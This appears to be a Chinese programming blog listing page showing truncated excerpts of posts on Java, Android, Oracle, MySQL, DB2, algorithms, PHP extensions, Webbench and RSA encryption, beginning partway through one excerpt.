    1) 新建java项目 2) 导入jar包,项目右击,properties—java build path—libraries—Add External jar,加入log4j.jar包。 3) 新建一个类com.hand.Log4jTest package com.hand; import org.apache.log4j.Logger; public class
  • 多点触摸(图片缩放为例) 不懂事的小屁孩 多点触摸
    多点触摸的事件跟单点是大同小异的,上个图片缩放的代码,供大家参考一下 import android.app.Activity; import android.os.Bundle; import android.view.MotionEvent; import android.view.View; import android.view.View.OnTouchListener
  • 有关浏览器窗口宽度高度几个值的解析 换个号韩国红果果 JavaScripthtml
    1 元素的 offsetWidth 包括border padding  content  整体的宽度。 clientWidth  只包括内容区 padding 不包括border。 clientLeft =  offsetWidth -clientWidth  即这个元素border的值 offsetLeft  若无已定位的包裹元素
  • 数据库产品巡礼:IBM DB2概览 蓝儿唯美 db2
    IBM DB2是一个支持了NoSQL功能的关系数据库管理系统,其包含了对XML,图像存储和Java脚本对象表示(JSON)的支持。DB2可被各种类型的企 业使用,它提供了一个数据平台,同时支持事务和分析操作,通过提供持续的数据流来保持事务工作流和分析操作的高效性。 DB2支持的操作系统 DB2可应用于以下三个主要的平台:   工作站,DB2可在Linus、Unix、Windo
  • java笔记5 a-john java
    控制执行流程: 1,true和false    利用条件表达式的真或假来决定执行路径。例:(a==b)。它利用条件操作符“==”来判断a值是否等于b值,返回true或false。java不允许我们将一个数字作为布尔值使用,虽然这在C和C++里是允许的。如果想在布尔测试中使用一个非布尔值,那么首先必须用一个条件表达式将其转化成布尔值,例如if(a!=0)。 2,if-els
  • Web开发常用手册汇总 aijuans PHP
    一门技术,如果没有好的参考手册指导,很难普及大众。这其实就是为什么很多技术,非常好,却得不到普遍运用的原因。 正如我们学习一门技术,过程大概是这个样子: ①我们日常工作中,遇到了问题,困难。寻找解决方案,即寻找新的技术; ②为什么要学习这门技术?这门技术是不是很好的解决了我们遇到的难题,困惑。这个问题,非常重要,我们不是为了学习技术而学习技术,而是为了更好的处理我们遇到的问题,才需要学习新的
  • 今天帮助人解决的一个sql问题 asialee sql
                今天有个人问了一个问题,如下: type     AD      value          A  
  • 意图对象传递数据 百合不是茶 android意图IntentBundle对象数据的传递
    学习意图将数据传递给目标活动; 初学者需要好好研究的       1,将下面的代码添加到main.xml中    <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android="http:/
  • oracle查询锁表解锁语句 bijian1013 oracleobjectsessionkill
    一.查询锁定的表 如下语句,都可以查询锁定的表 语句一: select a.sid, a.serial#, p.spid, c.object_name, b.session_id, b.oracle_username, b.os_user_name from v$process p, v$s
  • mac osx 10.10 下安装 mysql 5.6 二进制文件[tar.gz] 征客丶 mysqlosx
    场景:在 mac osx 10.10 下安装 mysql 5.6 的二进制文件。 环境:mac osx 10.10、mysql 5.6 的二进制文件 步骤:[所有目录请从根“/”目录开始取,以免层级弄错导致找不到目录] 1、下载 mysql 5.6 的二进制文件,下载目录下面称之为 mysql5.6SourceDir; 下载地址:http://dev.mysql.com/downl
  • 分布式系统与框架 bit1129 分布式
    RPC框架 Dubbo 什么是Dubbo   Dubbo是一个分布式服务框架,致力于提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。其核心部分包含:    远程通讯: 提供对多种基于长连接的NIO框架抽象封装,包括多种线程模型,序列化,以及“请求-响应”模式的信息交换方式。    集群容错: 提供基于接
  • 那些令人蛋痛的专业术语 白糖_ springWebSSOIOC
    spring 【控制反转(IOC)/依赖注入(DI)】: 由容器控制程序之间的关系,而非传统实现中,由程序代码直接操控。这也就是所谓“控制反转”的概念所在:控制权由应用代码中转到了外部容器,控制权的转移,是所谓反转。 简单的说:对象的创建又容器(比如spring容器)来执行,程序里不直接new对象。 Web 【单点登录(SSO)】:SSO的定义是在多个应用系统中,用户
  • 《给大忙人看的java8》摘抄 braveCS java8
    函数式接口:只包含一个抽象方法的接口 lambda表达式:是一段可以传递的代码       你最好将一个lambda表达式想象成一个函数,而不是一个对象,并记住它可以被转换为一个函数式接口。 事实上,函数式接口的转换是你在Java中使用lambda表达式能做的唯一一件事。   方法引用:又是要传递给其他代码的操作已经有实现的方法了,这时可以使
  • 编程之美-计算字符串的相似度 bylijinnan java算法编程之美
    public class StringDistance { /** * 编程之美 计算字符串的相似度 * 我们定义一套操作方法来把两个不相同的字符串变得相同,具体的操作方法为: * 1.修改一个字符(如把“a”替换为“b”); * 2.增加一个字符(如把“abdd”变为“aebdd”); * 3.删除一个字符(如把“travelling”变为“trav
  • 上传、下载压缩图片 chengxuyuancsdn 下载
    /** * * @param uploadImage --本地路径(tomacat路径) * @param serverDir --服务器路径 * @param imageType --文件或图片类型 * 此方法可以上传文件或图片.txt,.jpg,.gif等 */ public void upload(String uploadImage,Str
  • bellman-ford(贝尔曼-福特)算法 comsci 算法F#
    Bellman-Ford算法(根据发明者 Richard Bellman 和 Lester Ford 命名)是求解单源最短路径问题的一种算法。单源点的最短路径问题是指:给定一个加权有向图G和源点s,对于图G中的任意一点v,求从s到v的最短路径。有时候这种算法也被称为 Moore-Bellman-Ford 算法,因为 Edward F. Moore zu 也为这个算法的发展做出了贡献。 与迪科
  • oracle ASM中ASM_POWER_LIMIT参数 daizj ASMoracleASM_POWER_LIMIT磁盘平衡
    ASM_POWER_LIMIT 该初始化参数用于指定ASM例程平衡磁盘所用的最大权值,其数值范围为0~11,默认值为1。该初始化参数是动态参数,可以使用ALTER  SESSION或ALTER  SYSTEM命令进行修改。示例如下: SQL>ALTER  SESSION  SET   Asm_power_limit=2;
  • 高级排序:快速排序 dieslrae 快速排序
    public void quickSort(int[] array){ this.quickSort(array, 0, array.length - 1); } public void quickSort(int[] array,int left,int right){ if(right - left <= 0
  • C语言学习六指针_何谓变量的地址 一个指针变量到底占几个字节 dcj3sjt126com C语言
    # include <stdio.h> int main(void) { /* 1、一个变量的地址只用第一个字节表示 2、虽然他只使用了第一个字节表示,但是他本身指针变量类型就可以确定出他指向的指针变量占几个字节了 3、他都只存了第一个字节地址,为什么只需要存一个字节的地址,却占了4个字节,虽然只有一个字节, 但是这些字节比较多,所以编号就比较大,
  • phpize使用方法 dcj3sjt126com PHP
    phpize是用来扩展php扩展模块的,通过phpize可以建立php的外挂模块,下面介绍一个它的使用方法,需要的朋友可以参考下 安装(fastcgi模式)的时候,常常有这样一句命令: 代码如下: /usr/local/webserver/php/bin/phpize   一、phpize是干嘛的? phpize是什么? phpize是用来扩展php扩展模块的,通过phpi
  • Java虚拟机学习 - 对象引用强度 shuizhaosi888 JAVA虚拟机
    本文原文链接:http://blog.csdn.net/java2000_wl/article/details/8090276 转载请注明出处! 无论是通过计数算法判断对象的引用数量,还是通过根搜索算法判断对象引用链是否可达,判定对象是否存活都与“引用”相关。 引用主要分为 :强引用(Strong Reference)、软引用(Soft Reference)、弱引用(Wea
  • .NET Framework 3.5 Service Pack 1(完整软件包)下载地址 happyqing .net下载framework
      Microsoft .NET Framework 3.5 Service Pack 1(完整软件包)  http://www.microsoft.com/zh-cn/download/details.aspx?id=25150 Microsoft .NET Framework 3.5 Service Pack 1 是一个累积更新,包含很多基于 .NET Framewo
  • JAVA定时器的使用 jingjing0907 javatimer线程定时器
    1、在应用开发中,经常需要一些周期性的操作,比如每5分钟执行某一操作等。 对于这样的操作最方便、高效的实现方式就是使用java.util.Timer工具类。 privatejava.util.Timer timer; timer = newTimer(true); timer.schedule( newjava.util.TimerTask() { public void run()
  • Webbench 流浪鱼 webbench
    首页下载地址 http://home.tiscali.cz/~cz210552/webbench.html Webbench是知名的网站压力测试工具,它是由Lionbridge公司(http://www.lionbridge.com)开发。 Webbench能测试处在相同硬件上,不同服务的性能以及不同硬件上同一个服务的运行状况。webbench的标准测试可以向我们展示服务器的两项内容:每秒钟相
  • 第11章 动画效果(中) onestopweb 动画
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • windows下制作bat启动脚本. sanyecao2314 javacmd脚本bat
    java -classpath C:\dwjj\commons-dbcp.jar;C:\dwjj\commons-pool.jar;C:\dwjj\log4j-1.2.16.jar;C:\dwjj\poi-3.9-20121203.jar;C:\dwjj\sqljdbc4.jar;C:\dwjj\voucherimp.jar com.citsamex.core.startup.MainStart
  • Java进行RSA加解密的例子 tomcat_oracle java
    加密是保证数据安全的手段之一。加密是将纯文本数据转换为难以理解的密文;解密是将密文转换回纯文本。   数据的加解密属于密码学的范畴。通常,加密和解密都需要使用一些秘密信息,这些秘密信息叫做密钥,将纯文本转为密文或者转回的时候都要用到这些密钥。   对称加密指的是发送者和接收者共用同一个密钥的加解密方法。   非对称加密(又称公钥加密)指的是需要一个私有密钥一个公开密钥,两个不同的密钥的
  • Android_ViewStub 阿尔萨斯 ViewStub
    public final class ViewStub extends View java.lang.Object android.view.View android.view.ViewStub 类摘要: ViewStub 是一个隐藏的,不占用内存空间的视图对象,它可以在运行时延迟加载布局资源文件。当 ViewSt
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他